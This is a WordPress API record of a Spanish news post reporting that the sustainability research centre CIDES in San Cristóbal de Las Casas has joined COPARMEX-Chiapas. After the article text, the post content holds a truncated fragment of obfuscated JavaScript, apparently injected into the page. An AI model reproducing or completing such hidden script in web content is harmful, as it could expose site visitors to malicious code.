{"id":8631,"date":"2023-02-13T04:39:01","date_gmt":"2023-02-13T04:39:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8631"},"modified":"2023-02-13T04:39:01","modified_gmt":"2023-02-13T04:39:01","slug":"cides-es-miembro-ya-de-coparmex-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8631","title":{"rendered":"CIDES es miembro ya de COPARMEX- Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-11-at-7.59.29-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-8632\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-11-at-7.59.29-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-11-at-7.59.29-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-11-at-7.59.29-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-11-at-7.59.29-PM-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-11-at-7.59.29-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Mar\u00eda Jane Rivas Dami\u00e1n, Directora General del Centro de Investigaci\u00f3n para el Desarrollo Sustentable (CIDES) A.C. dio a conocer que recientemente formaron parte de la Confederaci\u00f3n Patronal de la Rep\u00fablica Mexicana (COPARMEX- Chiapas), adem\u00e1s de ser miembros de organismos internacionales como Global Sustainable Tourism Council \/ Consejo Global de Turismo Sostenible (GSTC) como Organizaci\u00f3n Acad\u00e9mica o Educativa; de la International Social Tourism Organization \/ Organizaci\u00f3n Internacional de Turismo Social (ISTO) como Instituci\u00f3n Acad\u00e9mica.En entrevista, dijo que este centro tiene como misi\u00f3n fomentar la investigaci\u00f3n cient\u00edfica, human\u00edstica y tecnol\u00f3gica para la generaci\u00f3n e innovaci\u00f3n de conocimientos en desarrollo sustentable, y la visi\u00f3n de ser l\u00edder en investigaci\u00f3n cient\u00edfica, human\u00edstica y tecnol\u00f3gica en desarrollo sustentable, lo cual han logrado al ser una instituci\u00f3n acad\u00e9mica reconocida por el Consejo Nacional de Ciencia y Tecnolog\u00eda de M\u00e9xico (CONACYT) con n\u00famero de Registro Nacional de Instituciones y Empresas Cient\u00edficas y Tecnol\u00f3gicas (RENIECYT) 1701469.Rivas Dami\u00e1n detall\u00f3 que el CIDES tiene como objetivos generales, \u201cgenerar conocimientos innovadores a trav\u00e9s de investigaciones cient\u00edficas, human\u00edsticas y tecnol\u00f3gicas en desarrollo sustentable, formar capital humano como investigadores cient\u00edficos, humanistas y tecn\u00f3logos que contribuyan a la soluci\u00f3n de problemas ecol\u00f3gicos, econ\u00f3micos y socioculturales de la humanidad y aplicar conocimientos innovadores mediante consultor\u00edas y\/o asesor\u00edas a diversas instituciones p\u00fablicas, privadas y comunitarias bajo los principios de la sustentabilidad\u201d.El CIDES fue fundada el 19 de marzo del 2011, y actualmente indic\u00f3 que est\u00e1 ubicado en San Crist\u00f3bal de Las Casas, en la calle Marte numero 3, de la Colonia Maya, al sur de esta ciudad, y oferta 6 \u00e1reas de conocimiento en Turismo Sostenible, Econom\u00eda Sostenible, Educaci\u00f3n para el Desarrollo Sostenible, Gesti\u00f3n del Patrimonio Cultural, Gesti\u00f3n del Patrimonio Natural y Gobernanza y Pol\u00edticas P\u00fablicas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Mar\u00eda Jane Rivas Dami\u00e1n, Directora General del Centro de Investigaci\u00f3n para el Desarrollo Sustentable (CIDES) A.C. dio a conocer que recientemente formaron parte de la Confederaci\u00f3n Patronal de la Rep\u00fablica Mexicana (COPARMEX- Chiapas), adem\u00e1s de ser miembros de organismos internacionales como Global Sustainable Tourism Council \/ Consejo Global de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8632,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8631","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8631","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8631"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8631\/revisions"}],"predecessor-version":[{"id":8633,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8631\/revisions\/8633"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8632"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8631"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8631"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8631"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}